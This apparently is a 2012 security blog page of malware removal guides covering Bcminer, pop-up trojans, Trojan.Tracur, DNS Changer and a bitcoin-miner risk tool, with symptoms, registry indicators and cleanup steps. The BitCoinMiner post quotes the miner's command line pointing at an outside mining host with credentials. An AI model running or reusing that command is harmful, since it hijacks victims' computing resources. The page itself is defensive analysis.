Running a quick system scan with other anti-malware tools clearly showed that Malwarebytes' couldn't remove malicious files from the infected computer.



C:\WINDOWS\assembly\GAC\Desktop.ini

Of course, Malwarebytes is a great tool, we use it very often but we do not rely on this single too only, you guys shouldn't either. In this case, Spyware Doctor did a great job and removed all the malicious files. To remove Trojan.Dropper.Bcminer and associated malware from your computer, please follow the removal instructions below. If you have any questions or valuable remarks, please leave a comment below. Good luck and be safe online!

http://deletemalware.blogspot.com


Trojan.Dropper.Bcminer removal instructions:

1. First of all, download TDSSKiller and run a system scan. This great utility will find and remove rootkits. Reboot your computer if required.

2. Then, download recommended anti-malware software (direct download) and run a full system scan to remove this virus from your computer.

Tell your friends:
Read More
Posted in Trojans | No comments

Monday, 13 August 2012

Phone Shaped Pop-ups In Lower Right Hand Corner and Random Redirects (Uninstall Guide)

Posted on 10:02 by Unknown
Some of our readers have been having an awful time trying to remove malicious software that constantly redirects them to spam or even malicious websites while browsing the net and displays either a square or phone shaped pop-up in the bottom right hand corner of their web browsers. Sometimes a pop-up window resembles a video screen of ads, please see the images below.

Previously, we wrote about Trojans horses that had a very similar payload. These Trojans displayed "Recommended for You" pop-ups in the lower corner of the web browser. It actually doesn't matter which browser you use because this happens on all major web browsers, whether it would be Internet Explorer, Mozilla Firefox or Google Chrome. Cyber criminals decided to remove "Recommended for You" notification from their ads probably because victims could easily Google this text and find out that their computers are infected with malicious software. Now, they usually display a smart phone shaped ads with links and also video screen ads.

Here’s what a typical phone shaped ad looks like:



And here’s another one titled "you are missing a plugin to play videos".



A slightly different approach but we believe it's still very effective. At the time of writing, this fake fake video update ad was redirecting users to two different websites but they both promoted the same free video player. Most likely, cyber crooks earned commissions from every successful install they made. While that's clearly not the most profitable traffic monetization model we’ve seen so far, it’s still an option and cyber crooks successfully use it.

We found at least three different Trojans horses that have exactly the same payloads: web browser redirect + annoying phone shaped pop-ups. Of course, there might be hundreds of them but we were looking at the most popular ones. All these Trojans displayed pop-ups in the bottom right hand corner of the web browsers and redirected users to spam websites. Now, one of those Trojans used very aggressive methods o hide its presence on the infected computer. It even made our antivirus software to disappear. That means we have encountered different families of Trojans.

What is more, very often these Trojans come bundled with rootkits which makes the removal procedure a lot more complicated than just simply removing a Trojan horse. Most antivirus programs handle Trojan horses very well but fail to remove rootkits. Thankfully, you can use free utilities to remove rootkits from infected computers, for example TDSSKiller, if your antivirus program can't remove them.

One more thing about this infection – it changes Windows Hosts file. Normally, it doesn't lock the Hosts file itself but we've seen a couple of Trojans that not only changes the file so that it would load spammy sites but also prevent further modifications. So, if you can remove malicious lines manually, please use this great Microsoft utility called "Fix it".

To remove phone shaped pop-ups in the bottom right hand corner of your web browser, please follow the removal instructions below. Should you need any further assistance, don't hesitate to contact us or just leave a comment below. Good luck and be safe online!

http://deletemalware.blogspot.com


Removal instructions:

1. Download recommended anti-malware software (direct download) and run a full system scan to remove this malware from your computer.

3. To reset the Hosts file back to the default automatically, download and run Fix it and follow the steps in the Fix it wizard.

4. Remove files from Windows %Temp% folder.

Tell your friends:
Read More
Posted in Trojans | No comments

Monday, 14 May 2012

Remove "Recommended for You" Pop-ups and Malware (Uninstall Guide)

Posted on 12:02 by Unknown
Over the last few weeks, some of our readers have alerted us to the fact that they got some kind of malicious software that redirected web browsers to different 3rd party websites and displayed intrusive advertisements in the lower right hand corner of their computer screens. No joke. However, it's a very common issue and sometimes it's rather difficult to tell whether it's caused by malware, browser helper object or just a useless web browser extension. Usually, web browser redirects are indeed caused by malware, mostly rootkits and Trojan horses, but that's not always the case. So, we decided to dig into the issue and trace the root of the problem.

Shortly after we ran a certain set of Trojans on our test machine, we found a sample (Trojan.Small.dac or Troj/RuinDl-Gen) that was responsible for the combination of the Recommended for You pop-ups and web browser redirects. The web browser redirects seem to happen at random or at least they didn't happen all the time. The Trojan horse displayed two different pop-up windows: an iPhone looking box with various advertisements and a smaller one with just random ads. It happened in Internet Explorer, Mozilla Firefox and Google Chrome. Can't blame the browser this time. It's probably a cross platform malware too. Besides, it happened on both 32-bit and 64-bit systems. Ads were not very intrusive, they didn't show up like every two or five minutes. Once you minimize the ad box, it doesn't appear until you restart your computer. That's right, you can't close the ad box, when you click the "X" it just minimizes into a smaller box that says "Recommended for You".

An-iPhone looking ad box:



A smaller one, but still very annoying:



Recommended for You box:



Now, that we know the root of this problem (malware) we can take the appropriate actions. Running a full virus scan with anti-malware software is essential step towards solving the Recommended for You malware problem. Once the Trojan horse is gone, you need to replace Windows Host file since it's partly responsible for web browser redirects and annoying pop-ups as well. Yes, the Trojan modifies Windows Hosts file making web browser inquiries a subject to redirect. To remove this malware from your computer, please follow the steps in the removal guide below. Should you need any further assistance, don't hesitate to contact us or just leave a comment below. Good luck and be safe online!

http://deletemalware.blogspot.com


Recommended for You malware removal instructions:

1. Download recommended anti-malware software (direct download) and run a full system scan to remove this malware from your computer.

3. To reset the Hosts file back to the default automatically, download and run Fix it and follow the steps in the Fix it wizard.

4. Remove files from Windows %Temp% folder.

Tell your friends:
Read More
Posted in Trojans | No comments

Tuesday, 1 May 2012

Remove Trojan.Tracur (Uninstall Guide)

Posted on 10:09 by Unknown
One of our computers has been recently hit by a dreaded Trojan horse called Trojan.Tracur. That's not a huge surprise for us since most of the time we infect our computers intentionally just to find you what certain computer viruses do and how to effectively get rid of them. It's been almost a year since major security vendors discovered this Trojan horse. The distribution and risk levels were always low for this threat but Trojan.Tracur activity has rapidly increased in the past week.

This Trojan horse redirects network traffic to malicious or infected websites. That's the main payload of this infection. Depending on your experience, you may think it's not a serious computer security threat but not everything is what it looks like at first glance. Trojan.Tracur can secretly download and execute malicious modules and make your computer wide open to a whole range of different computer attacks. It can also steal information which can lead to identity theft or financial loss. Once installed, Win32 Trojan.Tracur copies itself to Windows system folder as already existing DLL file, for example: reagent32.exe, imageres32.exe, etc. Then, this Trojan horse attempts to connect to a server and download additional malicious files onto the infected computer (Trojan.TracurB). If the C&C servers are online, it downloads at least three additional files with different functionality/characteristics and waits for other commands from the Command and Control server. The malware author can perform the following actions on the compromised computer:
  • Download and execute malicious files
  • Control the web browser redirection parameters
  • Steal information
Furthermore, the Trojan horse Trojan.Tracur modifies Windows registry values and installs web browser plug-ins that are responsible for web browser redirects. So, basically the Trojan install itself as a web browser extension of Mozilla Firefox and Google Chrome. These are usually detected as Trojan.BHO. After conducting some research we found out that the Trojan horse redirects traffic when the user of the infected computer tries to visit a website with a URL that contains specific strings, e.g., Google, Yahoo, Bing and some other popular search engines.

Last, but not least, it create a Windows Service which starts up automatically when you turn on your computer. It loads the malicious executable file from the Windows %System% folder. The name of the malicious Windows Service may vary, but it's usually something like Print Spooler or anything else that may sound legitimate. As with many other issues in computer security, you hopefully know your situation better than anyone else, however you have to make sure monitor system changes. Why? Because search engine redirects and browser hijackers are very common problems nowadays and unfortunately they are not being taken seriously by PC technicians and users. Why to bother? You probably installed some sort of toolbar in your web browser that causes redirects and it can be easily uninstalled using the Add/Remove Programs control panel. Nothing serious. I hear this very often. If you have been getting redirects in your Google searches and notifications from antivirus software about Trojan.Tracur.Gen activity, then your PC is definitely compromised. And this time, it's not the TDSS/ZAccess rootkit that redirects search results to Happili. It's a Trojan horse + malicious browser helper objects.

Even though, you can remove this Trojan horse from your computer manually, we recommend you to scan the infected computer with up to date anti-malware software. Manual removal can be very complicated and time consuming task. You may miss some core Trojan.Tracur files and then infection will eventually reappear next time you turn on your PC. To remove the Trojan.Tracur infection from your computer, please follow the step in the removal guide below. If you have any questions, please leave a comment.

Mike, http://deletemalware.blogspot.com


Trojan.Tracur removal instructions:

1. Download and execute TDSSKiller. This utility will remove malicious .dlls and executable files that may have rootkit capabilities.

2. Then download recommended anti-malware software (direct download) and run a full system scan to remove Trojan.Tracur from your computer. Don't forget to update anti-malware software before scanning.


Associated Trojan.Tracur files and registry values:

Files:
  • C:\WINDOWS\System32\[NAME OF AN EXISTING DLL]32.exe
Registry values:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{989A5447-1A50-4D02-BA55-724A516C1370}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{989A5447-1A50-4D02-BA55-724A516C1370}
  • HKEY_CLASSES_ROOT\CLSID\{989A5447-1A50-4D02-BA55-724A516C1370}
  • HKEY_CLASSES_ROOT\.fsharproj
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.fsharproj
Tell your friends:
Read More
Posted in Trojans | No comments

Tuesday, 7 February 2012

How to Remove DNS Changer (Uninstall Guide)

Posted on 13:41 by Unknown
If you haven't already, we recommend that you take a few minutes to determine if your computer has been affected by the DNS Changer virus. There are still nearly half a million computers infected by this malicious software or at least using the Rove Digital domain name servers in Europe and the U.S. This DNS infrastructure was formerly used by botnet czars to redirect unsuspecting victims to infected websites, alter user searches, replace ads, block legit anti-virus software and promote fake security products. Cyber crooks earned millions of dollars display false advertisements and redirecting users to wrong websites.

The FBI arrested six Estonians who ran the botnet that infected millions of computers worldwide and took over the control of rogue DNS servers. They now produce correct DNS answers but only until March 8th, 2012 Update: DNS servers will be shut down on Monday, July 9. That's official. The FBI will discontinue to provide this service. Then what? Infected computers will not longer be able to look up names using those name servers. In other words, users who are still affected by this DNS Changer malware won't find anything on the internet. If that had happened, Internet Explorer for example, would say something like "Internet Explorer cannot display the webpage", "No such server", etc.



While there's a slight chance that the FBI will continue to provide this service, I don't think that keeping your computer infected is a good idea. Not only DNS Changer virus causes a computer to use rogue DNS servers, it also disables security updates and blocks anti-virus software/websites. It can also change the DNS settings within small (home) office routers. As you can see, it's rather sophisticated piece of malicious code that very often comes with additional payloads (Trojan.DNSChanger, Trojan.Fakealert, Trojan.Generic). It is thus very important to remove DNS Changer virus. And it isn't only the job of FBI and PC repair technicians. You have to take responsibility for your own security as well. Good luck and be safe online!


So, are you infected?

1. You can check your DNS settings by simply visiting one of the following websites:
  • dns-ok.us
  • dns-ok.de (Germany)
  • dns-ok.fi (Finland)
RED = your computer is using the DNS Changer rogue name servers and is therefore probably infected.


GREEN = your computer appears to be looking up IP addresses correctly.



2. Visit FBI's website and enter your IP address: https://forms.fbi.gov/check-to-see-if-your-computer-is-using-rogue-DNS

If your computer is infected, you'll see the following notification.



3. Check your DNS settings manually. If your computers' DNS settings use the follow ranges, then you likely have been affected by the DNS Changer virus.

Between this IP...
... and this IP
77.67.83.1 77.67.83.254
85.255.112.1 85.255.127.254
67.210.0.1 67.210.15.254
93.188.160.1 93.188.167.254
213.109.64.1 213.109.79.254
64.28.176.1 64.28.191.254

Here's a very helpful document that explains how to check your DNS settings to see whether you are using bad DNS servers. Please see DNS-changer-malware.pdf

4. Check your router. Compare the DNS servers listed to those in the rogue DNS servers table above. If your router is configured to use one or more of the rogue DNS servers, your computer may be infected with DNSChanger malware. Please reset your router to default factory settings and change passwords.


How to restore DNS settings to default?

Changing DNS server settings on Microsoft Windows XP:

1. Go to Control Panel → Network Connections and select your local network.
2. Right-click Properties, then select Internet Protocol (TCP/IP).
3. Right-click and select Properties.
4. Click Properties. You should now see a window like the one below.



5. Select Obtain DNS server address automatically and click OK to save the changes.

Changing DNS server settings on Microsoft Windows 7:

1. Go to Control Panel.
2. Click Network and Internet, then Network and Sharing Center, and click Change adapter settings.
3. Right-click Local Area Connection, and click Properties.
4. Select the Networking tab. Select Internet Protocol Version 4 (TCP/IPv4) or Internet Protocol Version 6 (TCP/IPv6) and then click Properties.
5. Click Advanced and select the DNS tab. Select Obtain DNS server address automatically and click OK to save the changes.


How to remove DNS Changer malware?

1. Download and run TDSSKiller. Press the button Start scan for the utility to start scanning.

2. Wait for scanning to finish. Select Cure and click Continue to cure found threat.



3. A reboot might require after disinfection. Click Reboot computer.



4. Download recommended anti-malware software (direct download) and run a full system scan to remove DNS Changer malware from your computer.

That's it! If you have any questions or need extra help removing DNSChanger virus, please leave a comment below.

Tell your friends:
Read More
Posted in Trojans | No comments

Thursday, 26 January 2012

Remove RiskTool.Win32.BitCoinMiner (Uninstall Guide)

Posted on 12:05 by Unknown
RiskTool.Win32.BitCoinMiner is a risk tool or potentially unwanted application that may use your computer's resources to generate bitcoin blocks and send them to a remote location. What is bitcoin? Bitcoins are a virtual currency. Everyone who has a computer with the high-end graphics card and internet access can generate bitcoins and then sell the coins in exchange for a hard currency. The current US dollar-to-bitcoin rate at the time of writing is $5.62 per bitcoin according to mtgox.com. However, exchange rates may vary daily. An average value of one bitcoin was $29 back in June, 2011. Join any Bitcoin network you like, acquire a bitcoin wallet, install mining client and you are ready to go. It's free and legal.

Why then it's considered risk tool? Malware authors are infecting computer systems with powerful GPUs to make easy money. They are using your precious GPU and CPU resources to generate bitcoins without your consent. Let's say you have a graphic card worth $140. In the best case scenario, depending on the difficulty factor and other stuff, cyber crooks can generate bitcoins worth around $150 per month. Combined with thousands of other infected computers, cyber crooks can expect to earn some serious cash.

RiskTool.Win32.BitCoinMiner is distributed through drive-by download, social networks, instant messengers and removable drives. The bit coin mining module can be also downloaded by the NgrBot. This bot determines GeoIp details, downloads additional modules from the Internet and kills all previous bitcoin mining processes. It has spyware modules as well. Symptoms of RiskTool.Win32.BitCoinMiner infection:

High CPU usage. BitCoinMiner uses the computer's CPU resources very intensively by performing highly complex computations. It's a very time consuming process. It makes an infected computer run very slow, so malware authors decided to generate Bitcoins by leveraging the CPU cycles of infected machine. By the way, the NgrBot attempts to load nvcuda.dll if present to mine Bitcoins using GPU.



Suspicious network activity. There are more packets Sent than Received.



Active connections to specific servers. It mines for bitcoins at one minute intervals by executing the following command:

hehe.exe -a 60 -g yes -o http://hdzx.aquarium-stakany.com:8332/ -u darkSons_crypt -p blabblabla -t 2



RiskTool.Win32.BitCoinMiner is added to the list of startup programs. The risk tool also changes Windows regsitry, so that it runs every time Windows starts.



RiskTool.Win32.BitCoinMiner can infect USB pen drives and other removable media. Don't just USB pen drive when your computer is infected with this malware.

RiskTool.Win32.BitCoinMiner detection:



There's a great chance it came bundled with other malicious software. If you got infected with this risk tool, please scan your computer with anti-malware software. if you have any questions, please leave a comment. Good luck and be safe online!

Download recommended anti-malware software and run a full system scan. It will detect and remove this infection from your computer.





Tell your friends:
Read More
Posted in Trojans | No comments
Older Posts Home
Subscribe to: Posts (Atom)

Popular Posts

  • Remove Viruses Located in the $Recycle.Bin Folder (Uninstall Guide)
    The $Recycle.Bin folder is a genuine Windows folder. It is part of the file system. It is there to give you a chance to undelete a file when...
  • Remove Ask Search and Ask Toolbar (Uninstall Guide)
    Ask Search and Ask Toolbar are very often incorrectly classified as virus/spyware that may cause search redirects. The majority of us pref...
  • Facebook Security and Privacy Best Practices
    Facebook is the most popular social networking site. Nearly all of my friends have Facebook accounts. They log on to Facebook at least a cou...
  • How to Remove Easy Scan (Uninstall Guide)
    Easy Scan is a rogue application that pretends to be legitimate software, in this case registry cleaner and hard drive optimization program...
  • Smartphone Security: Using Your Mobile Phone Safely
    Smartphone is like a little copy of your computer with lots of personal information: photos, text messages, access to e-mail account and oth...
  • Fake avast! Antivirus: Avast-antivirus-francais.exe
    Cyber-criminals are attempting to benefit from unexperienced web users who are looking for anti-virus software. We found a couple of mislead...
  • Antivired.com and other Antivirus Monitor Related Domains
    Just a short note about several malicious domains related to the Antivirus Monitor fraud. This rogue anti-virus program reports non-existent...
  • Boxore Adware (Uninstall Guide)
    Today we came across another adware application called Boxore. It's distributed the old-fashioned way: people search for free online mov...
  • Show Hidden Files and Folders in Windows
    By default Microsoft Windows hides important files from being seen with Windows Explorer in order to protect these files from being modified...
  • Antispyis.com and other Antivirus Scan related domains
    New additions of misleading websites which promote a rogue security application called Antivirus Scan. antispyis.com afantispy.net softwaree...

Categories

  • Adware
  • Answers
  • Antivirus software
  • Browser Hijackers
  • Cloud Computing
  • Fake Alerts
  • Giveaways
  • Hoax
  • How-To
  • IaaS
  • Internet
  • Malicious websites
  • Malware
  • PaaS
  • Parental Controls
  • Passwords
  • Phishing
  • Process Information
  • Ransomware
  • Rogue programs
  • Rootkits
  • SaaS
  • Security Advisories
  • Spam
  • Spyware
  • Trojans
  • Viruses
  • Web Browsers
  • Worms

Blog Archive

  • ▼  2013 (173)
    • ▼  December (6)
      • Squirrel Web Removal Guide
      • What is levelqualitywatcher64.exe and how to remov...
      • What is levelqualitywatcher32.exe and how to remov...
      • What is adpeakproxy.exe and how to remove it?
      • How to remove ScorpionSaver adware (Uninstall Guide)
      • Remove Level Quality Watcher, removal guide
    • ►  November (13)
    • ►  October (11)
    • ►  September (20)
    • ►  August (4)
    • ►  July (17)
    • ►  June (31)
    • ►  May (25)
    • ►  April (15)
    • ►  March (17)
    • ►  February (7)
    • ►  January (7)
  • ►  2012 (86)
    • ►  November (2)
    • ►  October (4)
    • ►  September (6)
    • ►  August (6)
    • ►  July (11)
    • ►  June (1)
    • ►  May (5)
    • ►  April (7)
    • ►  March (7)
    • ►  February (17)
    • ►  January (20)
  • ►  2011 (239)
    • ►  December (8)
    • ►  November (18)
    • ►  October (21)
    • ►  September (24)
    • ►  August (28)
    • ►  July (32)
    • ►  June (16)
    • ►  May (23)
    • ►  April (15)
    • ►  March (16)
    • ►  February (9)
    • ►  January (29)
  • ►  2010 (2)
    • ►  December (2)
Powered by Blogger.

About Me

Unknown
View my complete profile